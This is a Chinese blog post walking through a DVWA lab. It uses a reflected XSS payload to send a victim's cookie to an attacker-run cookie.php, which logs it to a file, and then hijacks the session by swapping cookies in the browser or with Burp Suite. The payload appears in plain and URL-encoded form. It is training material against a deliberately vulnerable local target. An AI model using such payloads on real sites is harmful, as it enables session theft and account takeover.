zoukankan      html  css  js  c++  java
  • dvwa下利用xss获取cookie并利用(绕过验证)

    一、准备

    首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

    这里就以low级别进行操作

     二、获取cookie

     选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

     确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:wampwww(仅供参考)

     

     目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

    接下来需要根据题目构造js语句

    <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>  #语句是跳转执行访问指定的文件, 并在url中显示cookie

    使用js语句获取cookie的两种方式:

    第一种方式:url栏输入,进行url编码

    原始URL:
    http://location/dvwa/vulnerabilities/xss_r/?name=
    <script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
    需要进行URL编码:
    http://localhost/dvwa/vulnerabilities/xss_r/?name=
    %3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

    第二种方式是在xss注入处直接些参数

    <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

    提交,成功的话会跳转到另一个界面

    现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

     另外能够看到浏览器url框内有一个cookie的值

     三、攻击者利用获取到的cookie登录到受害者的账户

    第一种方式:修改浏览器记录的cookie

    获取到cookie后打开另外一个浏览器访问dvwa(此浏览器用别的账号登陆过DVWA,所以浏览器有对应的cookie格式)(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值。

     修改cookie为获取的cookie 并将security 设为low ,然后输入目标用户的ID和密码登陆目标用户,

     

    第二种方式:使用burpsuite 抓包,改包, 

     

     ok,已经成功利用获取到的cookie进行登录

  • 相关阅读:
    25个妙招儿,帮你每天挤出一小时
    怎样把outlook只最小化到托盘中而不再任务栏中显示
    背完这999句,你的英语口语绝对没有问题了!
    掌握自己的未来
    asp.net page liftcycle
    [转]浅析软件项目管理中十个误区
    明确一个古老的问题left join,right join,inner join,full join,cross join
    项目管理缩略语英中注释表
    30秒清除你电脑中的垃圾(使你的电脑急速如飞)
    看美片必备英语常识(转载)
  • 原文地址:https://www.cnblogs.com/forforever/p/12685183.html
Copyright © 2011-2022 走看看